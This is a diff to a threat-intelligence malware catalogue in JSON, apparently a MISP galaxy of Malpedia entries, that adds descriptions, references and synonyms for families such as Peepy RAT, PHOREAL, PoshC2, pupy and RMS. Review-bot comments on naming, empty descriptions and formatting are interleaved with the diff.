- "https://bitbucket.org/daniel_plohmann/idapatchwork"
+ "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim"
 ],
 "synonyms": [
 "nymain"
@@ -11091,6 +12763,19 @@
 "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d",
 "value": "OpBlockBuster"
 },
+ {
+ "description": "FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "092262b0-c631-400d-9f38-017cd59a14fd",
+ "value": "ORANGEADE"
+ },
 {
 "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.",
 "meta": {
@@ -11109,10 +12794,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat",
+ "https://orcustechnologies.com/",
 "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
+ "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html",
 "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
- "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/",
- "https://orcustechnologies.com/"
+ "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/",
+ "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/"
 ],
 "synonyms": [],
 "type": []
@@ -11134,6 +12821,19 @@
 "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5",
 "value": "Ordinypt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b",
+ "value": "Outlook Backdoor"
+ },
 {
 "description": "",
 "meta": {
@@ -11246,6 +12946,19 @@
 "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf",
 "value": "parasite_http"
 },
+ {
+ "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "49321579-9dfe-45c6-80df-79467e4af65d",
+ "value": "Peepy RAT"
+ },
 {
 "description": "",
 "meta": {
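Review bot: The new entry is named `Peepy RAT` and its malpedia ref is `win.peepy_rat`, but the description consistently calls the family `Peppy`, so a reader searching the galaxy by either spelling matches only one field. The Proofpoint Transparent Tribe reference in the same refs array is presumably where the `Peppy` spelling comes from, so both names are in circulation. Suggest recording the alternate spelling as `"synonyms": [ "Peppy" ]` instead of leaving the array empty, and confirming against the malpedia entry which spelling the cluster should carry as the value.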
@@ -11334,6 +13047,21 @@
 "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d",
 "value": "Philadephia Ransom"
 },
+ {
+ "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal",
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf"
+ ],
+ "synonyms": [
+ "Rizzo"
+ ],
+ "type": []
+ },
+ "uuid": "3aa6fd62-9b91-4136-af0e-08af7962ba4b",
+ "value": "PHOREAL"
+ },
 {
 "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.",
 "meta": {
@@ -11341,8 +13069,9 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex",
 "https://www.johannesbader.ch/2016/02/phorpiex/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
- "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/",
- "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows"
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
+ "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows",
+ "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/"
 ],
 "synonyms": [
 "Trik"
@@ -11519,20 +13248,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx",
+ "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
 "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
 "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
+ "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
 "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
 "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
 "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
 "https://community.rsa.com/thread/185439",
 "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
 "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
- "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
+ "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
 "https://securelist.com/time-of-death-connected-medicine/84315/",
 "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
- "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
+ "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
 "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
 "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf"
 ],
@@ -11566,6 +13296,7 @@
 "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/",
 "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant",
 "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
+ "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
 "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii",
 "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/",
 "http://blogs.360.cn/post/APT_C_01_en.html",
@@ -11665,6 +13396,19 @@
 "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7",
 "value": "poscardstealer"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0215eae2-0ab7-4567-8ac6-1be36a7893a6",
+ "value": "PoshC2"
+ },
 {
 "description": "",
 "meta": {
@@ -11691,6 +13435,19 @@
 "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd",
 "value": "PowerDuke"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz",
+ "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475",
+ "value": "powerkatz"
+ },
 {
 "description": "",
 "meta": {
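Review bot: The PoshC2 element (hunk at old line 11665) is added with `"description": ""`, so a consumer of this cluster sees only a name for what is, per the linked Malpedia page, a publicly available PowerShell/C# command-and-control framework rather than a family tied to one actor; that distinction matters when cluster membership drives attribution or alert severity. A one-line description would carry it, e.g. `"description": "PoshC2 is a publicly available PowerShell/C# post-exploitation and command-and-control framework; its presence indicates offensive tooling rather than a specific actor."`. The powerkatz element added in the next hunk (old line 11691) has the same gap; its Malpedia entry and the Yoroi reference can supply the wording.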
@@ -11705,11 +13462,13 @@
 "value": "PowerPool"
 },
 {
- "description": "",
+ "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff",
- "https://lokalhost.pl/gozi_tree.txt"
+ "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.thesecuritybuddy.com/malware-prevention/what-is-powersniff-malware/",
+ "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/"
 ],
 "synonyms": [],
 "type": []
@@ -11724,6 +13483,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba",
 "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
+ "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/",
 "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
 ],
 "synonyms": [],
@@ -11750,6 +13510,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator",
+ "https://securelist.com/a-predatory-tale/89779",
 "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/"
 ],
 "synonyms": [],
@@ -11805,6 +13566,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix",
+ "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/",
 "https://twitter.com/mesa_matt/status/1035211747957923840"
 ],
 "synonyms": [],
@@ -11833,7 +13595,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
+ "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
+ "https://cert.gov.ua/news/42",
+ "https://blog.threatstop.com/russian-apt-gamaredon-group",
+ "https://cert.gov.ua/news/46"
 ],
 "synonyms": [],
 "type": []
@@ -11870,20 +13636,22 @@
 "value": "Punkey POS"
 },
 {
- "description": "",
+ "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy",
- "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
 "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
- "https://github.com/n1nj4sec/pupy"
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://github.com/n1nj4sec/pupy",
+ "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8",
- "value": "pupy"
+ "value": "pupy (Windows)"
 },
 {
 "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. 
There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.",
@@ -11961,8 +13729,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky",
- "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
 "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/",
+ "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
+ "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/"
 ],
 "synonyms": [
@@ -12009,9 +13778,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot",
 "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
- "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
 "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
+ "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
 "http://contagiodump.blogspot.com/2010/11/template.html",
+ "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
 "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
 "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
 "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf",
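Review bot: Renaming `"value": "pupy"` to `"value": "pupy (Windows)"` in the hunk at old line 11870 changes the element's display name, and as far as I know MISP derives the galaxy tag text from `value`, so events already tagged with the old name would stop resolving to this element even though the uuid is unchanged. If the platform split is intended, listing the old name in `synonyms` (currently `[]`) would keep lookups by "pupy" working. The new description also calls Pupy cross-platform, so the "(Windows)" qualifier deserves a sentence explaining that this element covers the Windows loaders only.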
@@ -12078,15 +13848,17 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat",
 "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "https://github.com/quasar/QuasarRAT/tree/master/Client",
 "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
 "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
 "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
 "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://twitter.com/malwrhunterteam/status/789153556255342596",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments"
+ "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/"
 ],
 "synonyms": [],
 "type": []
@@ -12094,6 +13866,19 @@
 "uuid": "05252643-093b-4070-b62f-d5836683a9fa",
 "value": "Quasar RAT"
 },
+ {
+ "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab",
+ "https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "728ce877-6f1d-4719-81df-387a8e395695",
+ "value": "Qulab"
+ },
 {
 "description": "",
 "meta": {
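Review bot: The new Qulab description (hunk at old line 12094) ends with a literal `\r\n`, which survives into every UI, export and tag that prints the field; trim it to `"description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines."`. The same trailing line breaks appear in the ServHelper and SHIPSHAPE descriptions added further down (hunks at old lines 13322 and 13436), and the SPACESHIP and TeamBot descriptions (old lines 13916 and 14460) carry `\r\n` mid-sentence where text was pasted from a PDF; one normalisation pass over the new descriptions would fix all five.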
@@ -12151,7 +13936,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo",
- "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor"
+ "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html"
 ],
 "synonyms": [
 "brebsd"
@@ -12279,6 +14064,20 @@
 "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431",
 "value": "RapidStealer"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog",
+ "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/",
+ "https://tracker.fumik0.com/malware/Rarog"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "184e5134-473c-4a01-9a8b-f4776f178fc9",
+ "value": "Rarog"
+ },
 {
 "description": "",
 "meta": {
@@ -12325,6 +14124,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/",
 "https://www.f-secure.com/documents/996508/1030745/callisto-group",
 "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/"
 ],
@@ -12392,15 +14192,29 @@
 "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88",
 "value": "RedAlpha"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redaman",
+ "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b",
+ "value": "Redaman"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
- "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
 "http://blog.macnica.net/blog/2017/12/post-8c22.html",
+ "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
 "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
 "https://www.jpcert.or.jp/magazine/acreport-redleaves.html"
 ],
@@ -12484,6 +14298,7 @@
 "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "http://malware-traffic-analysis.net/2017/12/22/index.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
 "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
 "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
@@ -12502,7 +14317,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
 "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
+ "https://securelist.com/chafer-used-remexi-malware/89538/"
 ],
 "synonyms": [],
 "type": []
@@ -12527,7 +14343,8 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy",
+ "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html"
 ],
 "synonyms": [],
 "type": []
@@ -12566,11 +14383,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
+ "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
 "https://github.com/cocaman/retefe",
- "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
 "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
 "https://www.govcert.admin.ch/blog/35/reversing-retefe",
- "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/"
+ "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
+ "https://github.com/Tomasuh/retefe-unpacker"
 ],
 "synonyms": [
 "Tsukuba",
@@ -12612,6 +14430,19 @@
 "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
 "value": "RGDoor"
 },
+ {
+ "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof",
+ "https://blog.avast.com/rietspoof-malware-increases-activity"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ec67123a-c3bc-4f46-b9f3-569c19e224ca",
+ "value": "Rietspoof"
+ },
 {
 "description": "",
 "meta": {
@@ -12664,6 +14495,35 @@
 "uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
 "value": "Ripper ATM"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "148a7078-3a38-4974-8990-9d5881f8267b",
+ "value": "Rising Sun"
+ },
+ {
+ "description": "CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms",
+ "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf"
+ ],
+ "synonyms": [
+ "Remote Manipulator System"
+ ],
+ "type": []
+ },
+ "uuid": "94339b04-9332-4691-b820-5021368f1d3a",
+ "value": "RMS"
+ },
 {
 "description": "",
 "meta": {
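Review bot: The RMS element's own description says it is a legitimate, commercially licensed remote-administration tool, yet it is added with `"type": []` and nothing else that separates it from the malware families around it, so any consumer that alerts or blocks on membership in this cluster will fire on sanctioned administrative use. The distinction should be machine-visible rather than buried in prose: lead the description with a marker, e.g. `"description": "Dual-use legitimate tool. CyberInt states that Remote Manipulator System (RMS) …"`, or use a documented type value if the galaxy schema defines one for legitimate/abused software. I cannot tell from this diff whether such a type vocabulary exists, so treat the second option as something to confirm against the schema.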
@@ -12704,6 +14564,20 @@
 "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf",
 "value": "Rofin"
 },
+ {
+ "description": "A .NET variant of ps1.roguerobin",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin",
+ "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/",
+ "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "25b08d2e-f803-4520-9518-4d95ce9f6ed4",
+ "value": "RogueRobinNET"
+ },
 {
 "description": "",
 "meta": {
@@ -12789,6 +14663,23 @@
 "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b",
 "value": "Roseam"
 },
+ {
+ "description": "Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt",
+ "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html",
+ "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/"
+ ],
+ "synonyms": [
+ "RotoCrypt",
+ "Rotor"
+ ],
+ "type": []
+ },
+ "uuid": "f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966",
+ "value": "RotorCrypt"
+ },
 {
 "description": "",
 "meta": {
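Review bot: `"description": "A .NET variant of ps1.roguerobin"` in the RogueRobinNET element (hunk at old line 12704) refers to a Malpedia identifier, not to a name a reader of this cluster can resolve, and nothing in the element links it to the PowerShell RogueRobin entry. Spell it out in the description, e.g. `"description": "A .NET variant of the PowerShell-based RogueRobin trojan associated with DarkHydrus (Malpedia id ps1.roguerobin)."`; the DarkHydrus association is what the two linked Unit 42 and 360 articles are about.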
@@ -12972,7 +14863,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk",
- "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/"
+ "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
+ "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
+ "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/"
 ],
 "synonyms": [],
 "type": []
@@ -13035,7 +14932,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -13076,6 +14974,19 @@
 "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9",
 "value": "Sanny"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache",
+ "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
